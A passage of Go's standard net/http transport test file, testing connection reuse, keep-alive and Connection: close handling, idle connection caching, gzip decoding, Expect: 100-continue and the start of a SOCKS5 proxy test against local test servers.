113 defer tcs.mu.Unlock()
114 for i := 4; i >= 0; i-- {
115 for i, c := range tcs.list {
116 if tcs.closed[c] {
117 continue
118 }
119 if i != 0 {
120 tcs.mu.Unlock()
121 time.Sleep(50 * time.Millisecond)
122 tcs.mu.Lock()
123 continue
124 }
125 t.Errorf("TCP connection #%d, %p (of %d total) was not closed", i+1, c, len(tcs.list))
126 }
127 }
128 }
129
130 func TestReuseRequest(t *testing.T) {
131 defer afterTest(t)
132 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
133 w.Write([]byte("{}"))
134 }))
135 defer ts.Close()
136
137 c := ts.Client()
138 req, _ := NewRequest("GET", ts.URL, nil)
139 res, err := c.Do(req)
140 if err != nil {
141 t.Fatal(err)
142 }
143 err = res.Body.Close()
144 if err != nil {
145 t.Fatal(err)
146 }
147
148 res, err = c.Do(req)
149 if err != nil {
150 t.Fatal(err)
151 }
152 err = res.Body.Close()
153 if err != nil {
154 t.Fatal(err)
155 }
156 }
157
158 // Two subsequent requests and verify their response is the same.
159 // The response from the server is our own IP:port
160 func TestTransportKeepAlives(t *testing.T) {
161 defer afterTest(t)
162 ts := httptest.NewServer(hostPortHandler)
163 defer ts.Close()
164
165 c := ts.Client()
166 for _, disableKeepAlive := range []bool{false, true} {
167 c.Transport.(*Transport).DisableKeepAlives = disableKeepAlive
168 fetch := func(n int) string {
169 res, err := c.Get(ts.URL)
170 if err != nil {
171 t.Fatalf("error in disableKeepAlive=%v, req #%d, GET: %v", disableKeepAlive, n, err)
172 }
173 body, err := ioutil.ReadAll(res.Body)
174 if err != nil {
175 t.Fatalf("error in disableKeepAlive=%v, req #%d, ReadAll: %v", disableKeepAlive, n, err)
176 }
177 return string(body)
178 }
179
180 body1 := fetch(1)
181 body2 := fetch(2)
182
183 bodiesDiffer := body1 != body2
184 if bodiesDiffer != disableKeepAlive {
185 t.Errorf("error in disableKeepAlive=%v. unexpected bodiesDiffer=%v; body1=%q; body2=%q",
186 disableKeepAlive, bodiesDiffer, body1, body2)
187 }
188 }
189 }
190
191 func TestTransportConnectionCloseOnResponse(t *testing.T) {
192 defer afterTest(t)
193 ts := httptest.NewServer(hostPortHandler)
194 defer ts.Close()
195
196 connSet, testDial := makeTestDial(t)
197
198 c := ts.Client()
199 tr := c.Transport.(*Transport)
200 tr.Dial = testDial
201
202 for _, connectionClose := range []bool{false, true} {
203 fetch := func(n int) string {
204 req := new(Request)
205 var err error
206 req.URL, err = url.Parse(ts.URL + fmt.Sprintf("/?close=%v", connectionClose))
207 if err != nil {
208 t.Fatalf("URL parse error: %v", err)
209 }
210 req.Method = "GET"
211 req.Proto = "HTTP/1.1"
212 req.ProtoMajor = 1
213 req.ProtoMinor = 1
214
215 res, err := c.Do(req)
216 if err != nil {
217 t.Fatalf("error in connectionClose=%v, req #%d, Do: %v", connectionClose, n, err)
218 }
219 defer res.Body.Close()
220 body, err := ioutil.ReadAll(res.Body)
221 if err != nil {
222 t.Fatalf("error in connectionClose=%v, req #%d, ReadAll: %v", connectionClose, n, err)
223 }
224 return string(body)
225 }
226
227 body1 := fetch(1)
228 body2 := fetch(2)
229 bodiesDiffer := body1 != body2
230 if bodiesDiffer != connectionClose {
231 t.Errorf("error in connectionClose=%v. unexpected bodiesDiffer=%v; body1=%q; body2=%q",
232 connectionClose, bodiesDiffer, body1, body2)
233 }
234
235 tr.CloseIdleConnections()
236 }
237
238 connSet.check(t)
239 }
240
241 func TestTransportConnectionCloseOnRequest(t *testing.T) {
242 defer afterTest(t)
243 ts := httptest.NewServer(hostPortHandler)
244 defer ts.Close()
245
246 connSet, testDial := makeTestDial(t)
247
248 c := ts.Client()
249 tr := c.Transport.(*Transport)
250 tr.Dial = testDial
251 for _, connectionClose := range []bool{false, true} {
252 fetch := func(n int) string {
253 req := new(Request)
254 var err error
255 req.URL, err = url.Parse(ts.URL)
256 if err != nil {
257 t.Fatalf("URL parse error: %v", err)
258 }
259 req.Method = "GET"
260 req.Proto = "HTTP/1.1"
261 req.ProtoMajor = 1
262 req.ProtoMinor = 1
263 req.Close = connectionClose
264
265 res, err := c.Do(req)
266 if err != nil {
267 t.Fatalf("error in connectionClose=%v, req #%d, Do: %v", connectionClose, n, err)
268 }
269 if got, want := res.Header.Get("X-Saw-Close"), fmt.Sprint(connectionClose); got != want {
270 t.Errorf("For connectionClose = %v; handler's X-Saw-Close was %v; want %v",
271 connectionClose, got, !connectionClose)
272 }
273 body, err := ioutil.ReadAll(res.Body)
274 if err != nil {
275 t.Fatalf("error in connectionClose=%v, req #%d, ReadAll: %v", connectionClose, n, err)
276 }
277 return string(body)
278 }
279
280 body1 := fetch(1)
281 body2 := fetch(2)
282 bodiesDiffer := body1 != body2
283 if bodiesDiffer != connectionClose {
284 t.Errorf("error in connectionClose=%v. unexpected bodiesDiffer=%v; body1=%q; body2=%q",
285 connectionClose, bodiesDiffer, body1, body2)
286 }
287
288 tr.CloseIdleConnections()
289 }
290
291 connSet.check(t)
292 }
293
294 // if the Transport's DisableKeepAlives is set, all requests should
295 // send Connection: close.
296 // HTTP/1-only (Connection: close doesn't exist in h2)
297 func TestTransportConnectionCloseOnRequestDisableKeepAlive(t *testing.T) {
298 defer afterTest(t)
299 ts := httptest.NewServer(hostPortHandler)
300 defer ts.Close()
301
302 c := ts.Client()
303 c.Transport.(*Transport).DisableKeepAlives = true
304
305 res, err := c.Get(ts.URL)
306 if err != nil {
307 t.Fatal(err)
308 }
309 res.Body.Close()
310 if res.Header.Get("X-Saw-Close") != "true" {
311 t.Errorf("handler didn't see Connection: close ")
312 }
313 }
314
315 // Test that Transport only sends one "Connection: close", regardless of
316 // how "close" was indicated.
317 func TestTransportRespectRequestWantsClose(t *testing.T) {
318 tests := []struct {
319 disableKeepAlives bool
320 close bool
321 }{
322 {disableKeepAlives: false, close: false},
323 {disableKeepAlives: false, close: true},
324 {disableKeepAlives: true, close: false},
325 {disableKeepAlives: true, close: true},
326 }
327
328 for _, tc := range tests {
329 t.Run(fmt.Sprintf("DisableKeepAlive=%v,RequestClose=%v", tc.disableKeepAlives, tc.close),
330 func(t *testing.T) {
331 defer afterTest(t)
332 ts := httptest.NewServer(hostPortHandler)
333 defer ts.Close()
334
335 c := ts.Client()
336 c.Transport.(*Transport).DisableKeepAlives = tc.disableKeepAlives
337 req, err := NewRequest("GET", ts.URL, nil)
338 if err != nil {
339 t.Fatal(err)
340 }
341 count := 0
342 trace := &httptrace.ClientTrace{
343 WroteHeaderField: func(key string, field []string) {
344 if key != "Connection" {
345 return
346 }
347 if httpguts.HeaderValuesContainsToken(field, "close") {
348 count += 1
349 }
350 },
351 }
352 req = req.WithContext(httptrace.WithClientTrace(req.Context(), trace))
353 req.Close = tc.close
354 res, err := c.Do(req)
355 if err != nil {
356 t.Fatal(err)
357 }
358 defer res.Body.Close()
359 if want := tc.disableKeepAlives || tc.close; count > 1 || (count == 1) != want {
360 t.Errorf("expecting want:%v, got 'Connection: close':%d", want, count)
361 }
362 })
363 }
364
365 }
366
367 func TestTransportIdleCacheKeys(t *testing.T) {
368 defer afterTest(t)
369 ts := httptest.NewServer(hostPortHandler)
370 defer ts.Close()
371 c := ts.Client()
372 tr := c.Transport.(*Transport)
373
374 if e, g := 0, len(tr.IdleConnKeysForTesting()); e != g {
375 t.Errorf("After CloseIdleConnections expected %d idle conn cache keys; got %d", e, g)
376 }
377
378 resp, err := c.Get(ts.URL)
379 if err != nil {
380 t.Error(err)
381 }
382 ioutil.ReadAll(resp.Body)
383
384 keys := tr.IdleConnKeysForTesting()
385 if e, g := 1, len(keys); e != g {
386 t.Fatalf("After Get expected %d idle conn cache keys; got %d", e, g)
387 }
388
389 if e := "|http|" + ts.Listener.Addr().String(); keys[0] != e {
390 t.Errorf("Expected idle cache key %q; got %q", e, keys[0])
391 }
392
393 tr.CloseIdleConnections()
394 if e, g := 0, len(tr.IdleConnKeysForTesting()); e != g {
395 t.Errorf("After CloseIdleConnections expected %d idle conn cache keys; got %d", e, g)
396 }
397 }
398
399 // Tests that the HTTP transport re-uses connections when a client
400 // reads to the end of a response Body without closing it.
401 func TestTransportReadToEndReusesConn(t *testing.T) {
402 defer afterTest(t)
403 const msg = "foobar"
404
405 var addrSeen map[string]int
406 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
407 addrSeen[r.RemoteAddr]++
408 if r.URL.Path == "/chunked/" {
409 w.WriteHeader(200)
410 w.(Flusher).Flush()
411 } else {
412 w.Header().Set("Content-Type", strconv.Itoa(len(msg)))
413 w.WriteHeader(200)
414 }
415 w.Write([]byte(msg))
416 }))
417 defer ts.Close()
418
419 buf := make([]byte, len(msg))
420
421 for pi, path := range []string{"/content-length/", "/chunked/"} {
422 wantLen := []int{len(msg), -1}[pi]
423 addrSeen = make(map[string]int)
424 for i := 0; i < 3; i++ {
425 res, err := Get(ts.URL + path)
426 if err != nil {
427 t.Errorf("Get %s: %v", path, err)
428 continue
429 }
430 // We want to close this body eventually (before the
431 // defer afterTest at top runs), but not before the
432 // len(addrSeen) check at the bottom of this test,
433 // since Closing this early in the loop would risk
434 // making connections be re-used for the wrong reason.
435 defer res.Body.Close()
436
437 if res.ContentLength != int64(wantLen) {
438 t.Errorf("%s res.ContentLength = %d; want %d", path, res.ContentLength, wantLen)
439 }
440 n, err := res.Body.Read(buf)
441 if n != len(msg) || err != io.EOF {
442 t.Errorf("%s Read = %v, %v; want %d, EOF", path, n, err, len(msg))
443 }
444 }
445 if len(addrSeen) != 1 {
446 t.Errorf("for %s, server saw %d distinct client addresses; want 1", path, len(addrSeen))
447 }
448 }
449 }
450
451 func TestTransportMaxPerHostIdleConns(t *testing.T) {
452 defer afterTest(t)
453 resch := make(chan string)
454 gotReq := make(chan bool)
455 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
456 gotReq <- true
457 msg := <-resch
458 _, err := w.Write([]byte(msg))
459 if err != nil {
460 t.Fatalf("Write: %v", err)
461 }
462 }))
463 defer ts.Close()
464
465 c := ts.Client()
466 tr := c.Transport.(*Transport)
467 maxIdleConnsPerHost := 2
468 tr.MaxIdleConnsPerHost = maxIdleConnsPerHost
469
470 // Start 3 outstanding requests and wait for the server to get them.
471 // Their responses will hang until we write to resch, though.
472 donech := make(chan bool)
473 doReq := func() {
474 resp, err := c.Get(ts.URL)
475 if err != nil {
476 t.Error(err)
477 return
478 }
479 if _, err := ioutil.ReadAll(resp.Body); err != nil {
480 t.Errorf("ReadAll: %v", err)
481 return
482 }
483 donech <- true
484 }
485 go doReq()
486 <-gotReq
487 go doReq()
488 <-gotReq
489 go doReq()
490 <-gotReq
491
492 if e, g := 0, len(tr.IdleConnKeysForTesting()); e != g {
493 t.Fatalf("Before writes, expected %d idle conn cache keys; got %d", e, g)
494 }
495
496 resch <- "res1"
497 <-donech
498 keys := tr.IdleConnKeysForTesting()
499 if e, g := 1, len(keys); e != g {
500 t.Fatalf("after first response, expected %d idle conn cache keys; got %d", e, g)
501 }
502 addr := ts.Listener.Addr().String()
503 cacheKey := "|http|" + addr
504 if keys[0] != cacheKey {
505 t.Fatalf("Expected idle cache key %q; got %q", cacheKey, keys[0])
506 }
507 if e, g := 1, tr.IdleConnCountForTesting("http", addr); e != g {
508 t.Errorf("after first response, expected %d idle conns; got %d", e, g)
509 }
510
511 resch <- "res2"
512 <-donech
513 if g, w := tr.IdleConnCountForTesting("http", addr), 2; g != w {
514 t.Errorf("after second response, idle conns = %d; want %d", g, w)
515 }
516
517 resch <- "res3"
518 <-donech
519 if g, w := tr.IdleConnCountForTesting("http", addr), maxIdleConnsPerHost; g != w {
520 t.Errorf("after third response, idle conns = %d; want %d", g, w)
521 }
522 }
523
524 func TestTransportMaxConnsPerHostIncludeDialInProgress(t *testing.T) {
525 defer afterTest(t)
526 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
527 _, err := w.Write([]byte("foo"))
528 if err != nil {
529 t.Fatalf("Write: %v", err)
530 }
531 }))
532 defer ts.Close()
533 c := ts.Client()
534 tr := c.Transport.(*Transport)
535 dialStarted := make(chan struct{})
536 stallDial := make(chan struct{})
537 tr.Dial = func(network, addr string) (net.Conn, error) {
538 dialStarted <- struct{}{}
539 <-stallDial
540 return net.Dial(network, addr)
541 }
542
543 tr.DisableKeepAlives = true
544 tr.MaxConnsPerHost = 1
545
546 preDial := make(chan struct{})
547 reqComplete := make(chan struct{})
548 doReq := func(reqId string) {
549 req, _ := NewRequest("GET", ts.URL, nil)
550 trace := &httptrace.ClientTrace{
551 GetConn: func(hostPort string) {
552 preDial <- struct{}{}
553 },
554 }
555 req = req.WithContext(httptrace.WithClientTrace(req.Context(), trace))
556 resp, err := tr.RoundTrip(req)
557 if err != nil {
558 t.Errorf("unexpected error for request %s: %v", reqId, err)
559 }
560 _, err = ioutil.ReadAll(resp.Body)
561 if err != nil {
562 t.Errorf("unexpected error for request %s: %v", reqId, err)
563 }
564 reqComplete <- struct{}{}
565 }
566 // get req1 to dial-in-progress
567 go doReq("req1")
568 <-preDial
569 <-dialStarted
570
571 // get req2 to waiting on conns per host to go down below max
572 go doReq("req2")
573 <-preDial
574 select {
575 case <-dialStarted:
576 t.Error("req2 dial started while req1 dial in progress")
577 return
578 default:
579 }
580
581 // let req1 complete
582 stallDial <- struct{}{}
583 <-reqComplete
584
585 // let req2 complete
586 <-dialStarted
587 stallDial <- struct{}{}
588 <-reqComplete
589 }
590
591 func TestTransportRemovesDeadIdleConnections(t *testing.T) {
592 setParallel(t)
593 defer afterTest(t)
594 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
595 io.WriteString(w, r.RemoteAddr)
596 }))
597 defer ts.Close()
598
599 c := ts.Client()
600 tr := c.Transport.(*Transport)
601
602 doReq := func(name string) string {
603 // Do a POST instead of a GET to prevent the Transport's
604 // idempotent request retry logic from kicking in...
605 res, err := c.Post(ts.URL, "", nil)
606 if err != nil {
607 t.Fatalf("%s: %v", name, err)
608 }
609 if res.StatusCode != 200 {
610 t.Fatalf("%s: %v", name, res.Status)
611 }
612 defer res.Body.Close()
613 slurp, err := ioutil.ReadAll(res.Body)
614 if err != nil {
615 t.Fatalf("%s: %v", name, err)
616 }
617 return string(slurp)
618 }
619
620 first := doReq("first")
621 keys1 := tr.IdleConnKeysForTesting()
622
623 ts.CloseClientConnections()
624
625 var keys2 []string
626 if !waitCondition(3*time.Second, 50*time.Millisecond, func() bool {
627 keys2 = tr.IdleConnKeysForTesting()
628 return len(keys2) == 0
629 }) {
630 t.Fatalf("Transport didn't notice idle connection's death.\nbefore: %q\n after: %q\n", keys1, keys2)
631 }
632
633 second := doReq("second")
634 if first == second {
635 t.Errorf("expected a different connection between requests. got %q both times", first)
636 }
637 }
638
639 func TestTransportServerClosingUnexpectedly(t *testing.T) {
640 setParallel(t)
641 defer afterTest(t)
642 ts := httptest.NewServer(hostPortHandler)
643 defer ts.Close()
644 c := ts.Client()
645
646 fetch := func(n, retries int) string {
647 condFatalf := func(format string, arg ...interface{}) {
648 if retries <= 0 {
649 t.Fatalf(format, arg...)
650 }
651 t.Logf("retrying shortly after expected error: "+format, arg...)
652 time.Sleep(time.Second / time.Duration(retries))
653 }
654 for retries >= 0 {
655 retries--
656 res, err := c.Get(ts.URL)
657 if err != nil {
658 condFatalf("error in req #%d, GET: %v", n, err)
659 continue
660 }
661 body, err := ioutil.ReadAll(res.Body)
662 if err != nil {
663 condFatalf("error in req #%d, ReadAll: %v", n, err)
664 continue
665 }
666 res.Body.Close()
667 return string(body)
668 }
669 panic("unreachable")
670 }
671
672 body1 := fetch(1, 0)
673 body2 := fetch(2, 0)
674
675 ts.CloseClientConnections() // surprise!
676
677 // This test has an expected race. Sleeping for 25 ms prevents
678 // it on most fast machines, causing the next fetch() call to
679 // succeed quickly. But if we do get errors, fetch() will retry 5
680 // times with some delays between.
681 time.Sleep(25 * time.Millisecond)
682
683 body3 := fetch(3, 5)
684
685 if body1 != body2 {
686 t.Errorf("expected body1 and body2 to be equal")
687 }
688 if body2 == body3 {
689 t.Errorf("expected body2 and body3 to be different")
690 }
691 }
692
693 // Test for https://golang.org/issue/2616 (appropriate issue number)
694 // This fails pretty reliably with GOMAXPROCS=100 or something high.
695 func TestStressSurpriseServerCloses(t *testing.T) {
696 defer afterTest(t)
697 if testing.Short() {
698 t.Skip("skipping test in short mode")
699 }
700 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
701 w.Header().Set("Content-Length", "5")
702 w.Header().Set("Content-Type", "text/plain")
703 w.Write([]byte("Hello"))
704 w.(Flusher).Flush()
705 conn, buf, _ := w.(Hijacker).Hijack()
706 buf.Flush()
707 conn.Close()
708 }))
709 defer ts.Close()
710 c := ts.Client()
711
712 // Do a bunch of traffic from different goroutines. Send to activityc
713 // after each request completes, regardless of whether it failed.
714 // If these are too high, OS X exhausts its ephemeral ports
715 // and hangs waiting for them to transition TCP states. That's
716 // not what we want to test. TODO(bradfitz): use an io.Pipe
717 // dialer for this test instead?
718 const (
719 numClients = 20
720 reqsPerClient = 25
721 )
722 activityc := make(chan bool)
723 for i := 0; i < numClients; i++ {
724 go func() {
725 for i := 0; i < reqsPerClient; i++ {
726 res, err := c.Get(ts.URL)
727 if err == nil {
728 // We expect errors since the server is
729 // hanging up on us after telling us to
730 // send more requests, so we don't
731 // actually care what the error is.
732 // But we want to close the body in cases
733 // where we won the race.
734 res.Body.Close()
735 }
736 activityc <- true
737 }
738 }()
739 }
740
741 // Make sure all the request come back, one way or another.
742 for i := 0; i < numClients*reqsPerClient; i++ {
743 select {
744 case <-activityc:
745 case <-time.After(5 * time.Second):
746 t.Fatalf("presumed deadlock; no HTTP client activity seen in awhile")
747 }
748 }
749 }
750
751 // TestTransportHeadResponses verifies that we deal with Content-Lengths
752 // with no bodies properly
753 func TestTransportHeadResponses(t *testing.T) {
754 defer afterTest(t)
755 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
756 if r.Method != "HEAD" {
757 panic("expected HEAD; got " + r.Method)
758 }
759 w.Header().Set("Content-Length", "123")
760 w.WriteHeader(200)
761 }))
762 defer ts.Close()
763 c := ts.Client()
764
765 for i := 0; i < 2; i++ {
766 res, err := c.Head(ts.URL)
767 if err != nil {
768 t.Errorf("error on loop %d: %v", i, err)
769 continue
770 }
771 if e, g := "123", res.Header.Get("Content-Length"); e != g {
772 t.Errorf("loop %d: expected Content-Length header of %q, got %q", i, e, g)
773 }
774 if e, g := int64(123), res.ContentLength; e != g {
775 t.Errorf("loop %d: expected res.ContentLength of %v, got %v", i, e, g)
776 }
777 if all, err := ioutil.ReadAll(res.Body); err != nil {
778 t.Errorf("loop %d: Body ReadAll: %v", i, err)
779 } else if len(all) != 0 {
780 t.Errorf("Bogus body %q", all)
781 }
782 }
783 }
784
785 // TestTransportHeadChunkedResponse verifies that we ignore chunked transfer-encoding
786 // on responses to HEAD requests.
787 func TestTransportHeadChunkedResponse(t *testing.T) {
788 defer afterTest(t)
789 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
790 if r.Method != "HEAD" {
791 panic("expected HEAD; got " + r.Method)
792 }
793 w.Header().Set("Transfer-Encoding", "chunked") // client should ignore
794 w.Header().Set("x-client-ipport", r.RemoteAddr)
795 w.WriteHeader(200)
796 }))
797 defer ts.Close()
798 c := ts.Client()
799
800 // Ensure that we wait for the readLoop to complete before
801 // calling Head again
802 didRead := make(chan bool)
803 SetReadLoopBeforeNextReadHook(func() { didRead <- true })
804 defer SetReadLoopBeforeNextReadHook(nil)
805
806 res1, err := c.Head(ts.URL)
807 <-didRead
808
809 if err != nil {
810 t.Fatalf("request 1 error: %v", err)
811 }
812
813 res2, err := c.Head(ts.URL)
814 <-didRead
815
816 if err != nil {
817 t.Fatalf("request 2 error: %v", err)
818 }
819 if v1, v2 := res1.Header.Get("x-client-ipport"), res2.Header.Get("x-client-ipport"); v1 != v2 {
820 t.Errorf("ip/ports differed between head requests: %q vs %q", v1, v2)
821 }
822 }
823
824 var roundTripTests = []struct {
825 accept string
826 expectAccept string
827 compressed bool
828 }{
829 // Requests with no accept-encoding header use transparent compression
830 {"", "gzip", false},
831 // Requests with other accept-encoding should pass through unmodified
832 {"foo", "foo", false},
833 // Requests with accept-encoding == gzip should be passed through
834 {"gzip", "gzip", true},
835 }
836
837 // Test that the modification made to the Request by the RoundTripper is cleaned up
838 func TestRoundTripGzip(t *testing.T) {
839 setParallel(t)
840 defer afterTest(t)
841 const responseBody = "test response body"
842 ts := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
843 accept := req.Header.Get("Accept-Encoding")
844 if expect := req.FormValue("expect_accept"); accept != expect {
845 t.Errorf("in handler, test %v: Accept-Encoding = %q, want %q",
846 req.FormValue("testnum"), accept, expect)
847 }
848 if accept == "gzip" {
849 rw.Header().Set("Content-Encoding", "gzip")
850 gz := gzip.NewWriter(rw)
851 gz.Write([]byte(responseBody))
852 gz.Close()
853 } else {
854 rw.Header().Set("Content-Encoding", accept)
855 rw.Write([]byte(responseBody))
856 }
857 }))
858 defer ts.Close()
859 tr := ts.Client().Transport.(*Transport)
860
861 for i, test := range roundTripTests {
862 // Test basic request (no accept-encoding)
863 req, _ := NewRequest("GET", fmt.Sprintf("%s/?testnum=%d&expect_accept=%s", ts.URL, i, test.expectAccept), nil)
864 if test.accept != "" {
865 req.Header.Set("Accept-Encoding", test.accept)
866 }
867 res, err := tr.RoundTrip(req)
868 var body []byte
869 if test.compressed {
870 var r *gzip.Reader
871 r, err = gzip.NewReader(res.Body)
872 if err != nil {
873 t.Errorf("%d. gzip NewReader: %v", i, err)
874 continue
875 }
876 body, err = ioutil.ReadAll(r)
877 res.Body.Close()
878 } else {
879 body, err = ioutil.ReadAll(res.Body)
880 }
881 if err != nil {
882 t.Errorf("%d. Error: %q", i, err)
883 continue
884 }
885 if g, e := string(body), responseBody; g != e {
886 t.Errorf("%d. body = %q; want %q", i, g, e)
887 }
888 if g, e := req.Header.Get("Accept-Encoding"), test.accept; g != e {
889 t.Errorf("%d. Accept-Encoding = %q; want %q (it was mutated, in violation of RoundTrip contract)", i, g, e)
890 }
891 if g, e := res.Header.Get("Content-Encoding"), test.accept; g != e {
892 t.Errorf("%d. Content-Encoding = %q; want %q", i, g, e)
893 }
894 }
895
896 }
897
898 func TestTransportGzip(t *testing.T) {
899 setParallel(t)
900 defer afterTest(t)
901 const testString = "The test string aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
902 const nRandBytes = 1024 * 1024
903 ts := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
904 if req.Method == "HEAD" {
905 if g := req.Header.Get("Accept-Encoding"); g != "" {
906 t.Errorf("HEAD request sent with Accept-Encoding of %q; want none", g)
907 }
908 return
909 }
910 if g, e := req.Header.Get("Accept-Encoding"), "gzip"; g != e {
911 t.Errorf("Accept-Encoding = %q, want %q", g, e)
912 }
913 rw.Header().Set("Content-Encoding", "gzip")
914
915 var w io.Writer = rw
916 var buf bytes.Buffer
917 if req.FormValue("chunked") == "0" {
918 w = &buf
919 defer io.Copy(rw, &buf)
920 defer func() {
921 rw.Header().Set("Content-Length", strconv.Itoa(buf.Len()))
922 }()
923 }
924 gz := gzip.NewWriter(w)
925 gz.Write([]byte(testString))
926 if req.FormValue("body") == "large" {
927 io.CopyN(gz, rand.Reader, nRandBytes)
928 }
929 gz.Close()
930 }))
931 defer ts.Close()
932 c := ts.Client()
933
934 for _, chunked := range []string{"1", "0"} {
935 // First fetch something large, but only read some of it.
936 res, err := c.Get(ts.URL + "/?body=large&chunked=" + chunked)
937 if err != nil {
938 t.Fatalf("large get: %v", err)
939 }
940 buf := make([]byte, len(testString))
941 n, err := io.ReadFull(res.Body, buf)
942 if err != nil {
943 t.Fatalf("partial read of large response: size=%d, %v", n, err)
944 }
945 if e, g := testString, string(buf); e != g {
946 t.Errorf("partial read got %q, expected %q", g, e)
947 }
948 res.Body.Close()
949 // Read on the body, even though it's closed
950 n, err = res.Body.Read(buf)
951 if n != 0 || err == nil {
952 t.Errorf("expected error post-closed large Read; got = %d, %v", n, err)
953 }
954
955 // Then something small.
956 res, err = c.Get(ts.URL + "/?chunked=" + chunked)
957 if err != nil {
958 t.Fatal(err)
959 }
960 body, err := ioutil.ReadAll(res.Body)
961 if err != nil {
962 t.Fatal(err)
963 }
964 if g, e := string(body), testString; g != e {
965 t.Fatalf("body = %q; want %q", g, e)
966 }
967 if g, e := res.Header.Get("Content-Encoding"), ""; g != e {
968 t.Fatalf("Content-Encoding = %q; want %q", g, e)
969 }
970
971 // Read on the body after it's been fully read:
972 n, err = res.Body.Read(buf)
973 if n != 0 || err == nil {
974 t.Errorf("expected Read error after exhausted reads; got %d, %v", n, err)
975 }
976 res.Body.Close()
977 n, err = res.Body.Read(buf)
978 if n != 0 || err == nil {
979 t.Errorf("expected Read error after Close; got %d, %v", n, err)
980 }
981 }
982
983 // And a HEAD request too, because they're always weird.
984 res, err := c.Head(ts.URL)
985 if err != nil {
986 t.Fatalf("Head: %v", err)
987 }
988 if res.StatusCode != 200 {
989 t.Errorf("Head status=%d; want=200", res.StatusCode)
990 }
991 }
992
993 // If a request has Expect:100-continue header, the request blocks sending body until the first response.
994 // Premature consumption of the request body should not be occurred.
995 func TestTransportExpect100Continue(t *testing.T) {
996 setParallel(t)
997 defer afterTest(t)
998
999 ts := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
1000 switch req.URL.Path {
1001 case "/100":
1002 // This endpoint implicitly responds 100 Continue and reads body.
1003 if _, err := io.Copy(ioutil.Discard, req.Body); err != nil {
1004 t.Error("Failed to read Body", err)
1005 }
1006 rw.WriteHeader(StatusOK)
1007 case "/200":
1008 // Go 1.5 adds Connection: close header if the client expect
1009 // continue but not entire request body is consumed.
1010 rw.WriteHeader(StatusOK)
1011 case "/500":
1012 rw.WriteHeader(StatusInternalServerError)
1013 case "/keepalive":
1014 // This hijacked endpoint responds error without Connection:close.
1015 _, bufrw, err := rw.(Hijacker).Hijack()
1016 if err != nil {
1017 log.Fatal(err)
1018 }
1019 bufrw.WriteString("HTTP/1.1 500 Internal Server Error\r\n")
1020 bufrw.WriteString("Content-Length: 0\r\n\r\n")
1021 bufrw.Flush()
1022 case "/timeout":
1023 // This endpoint tries to read body without 100 (Continue) response.
1024 // After ExpectContinueTimeout, the reading will be started.
1025 conn, bufrw, err := rw.(Hijacker).Hijack()
1026 if err != nil {
1027 log.Fatal(err)
1028 }
1029 if _, err := io.CopyN(ioutil.Discard, bufrw, req.ContentLength); err != nil {
1030 t.Error("Failed to read Body", err)
1031 }
1032 bufrw.WriteString("HTTP/1.1 200 OK\r\n\r\n")
1033 bufrw.Flush()
1034 conn.Close()
1035 }
1036
1037 }))
1038 defer ts.Close()
1039
1040 tests := []struct {
1041 path string
1042 body []byte
1043 sent int
1044 status int
1045 }{
1046 {path: "/100", body: []byte("hello"), sent: 5, status: 200}, // Got 100 followed by 200, entire body is sent.
1047 {path: "/200", body: []byte("hello"), sent: 0, status: 200}, // Got 200 without 100. body isn't sent.
1048 {path: "/500", body: []byte("hello"), sent: 0, status: 500}, // Got 500 without 100. body isn't sent.
1049 {path: "/keepalive", body: []byte("hello"), sent: 0, status: 500}, // Although without Connection:close, body isn't sent.
1050 {path: "/timeout", body: []byte("hello"), sent: 5, status: 200}, // Timeout exceeded and entire body is sent.
1051 }
1052
1053 c := ts.Client()
1054 for i, v := range tests {
1055 tr := &Transport{
1056 ExpectContinueTimeout: 2 * time.Second,
1057 }
1058 defer tr.CloseIdleConnections()
1059 c.Transport = tr
1060 body := bytes.NewReader(v.body)
1061 req, err := NewRequest("PUT", ts.URL+v.path, body)
1062 if err != nil {
1063 t.Fatal(err)
1064 }
1065 req.Header.Set("Expect", "100-continue")
1066 req.ContentLength = int64(len(v.body))
1067
1068 resp, err := c.Do(req)
1069 if err != nil {
1070 t.Fatal(err)
1071 }
1072 resp.Body.Close()
1073
1074 sent := len(v.body) - body.Len()
1075 if v.status != resp.StatusCode {
1076 t.Errorf("test %d: status code should be %d but got %d. (%s)", i, v.status, resp.StatusCode, v.path)
1077 }
1078 if v.sent != sent {
1079 t.Errorf("test %d: sent body should be %d but sent %d. (%s)", i, v.sent, sent, v.path)
1080 }
1081 }
1082 }
1083
1084 func TestSOCKS5Proxy(t *testing.T) {
1085 defer afterTest(t)
1086 ch := make(chan string, 1)
1087 l := newLocalListener(t)
1088 defer l.Close()
1089 defer close(ch)
1090 proxy := func(t *testing.T) {
1091 s, err := l.Accept()
1092 if err != nil {
1093 t.Errorf("socks5 proxy Accept(): %v", err)
1094 return
1095 }
1096 defer s.Close()
1097 var buf [22]byte
1098 if _, err := io.ReadFull(s, buf[:3]); err != nil {
1099 t.Errorf("socks5 proxy initial read: %v", err)
1100 return
1101 }
1102 if want := []byte{5, 1, 0}; !bytes.Equal(buf[:3], want) {
1103 t.Errorf("socks5 proxy initial read: got %v, want %v", buf[:3], want)
1104 return
1105 }
1106 if _, err := s.Write([]byte{5, 0}); err != nil {
1107 t.Errorf("socks5 proxy initial write: %v", err)
1108 return
1109 }
1110 if _, err := io.ReadFull(s, buf[:4]); err != nil {
1111 t.Errorf("socks5 proxy second read: %v", err)
1112 return
1113 }
1114 if want := []byte{5, 1, 0}; !bytes.Equal(buf[:3], want) {
1115 t.Errorf("socks5 proxy second read: got %v, want %v", buf[:3], want)
1116 return
1117 }
1118 var ipLen int
1119 switch buf[3] {
1120 case 1:
1121 ipLen = net.IPv4len
1122 case 4:
1123 ipLen = net.IPv6len
1124 default:
1125 t.Errorf("socks5 proxy second read: unexpected address type %v", buf[4])
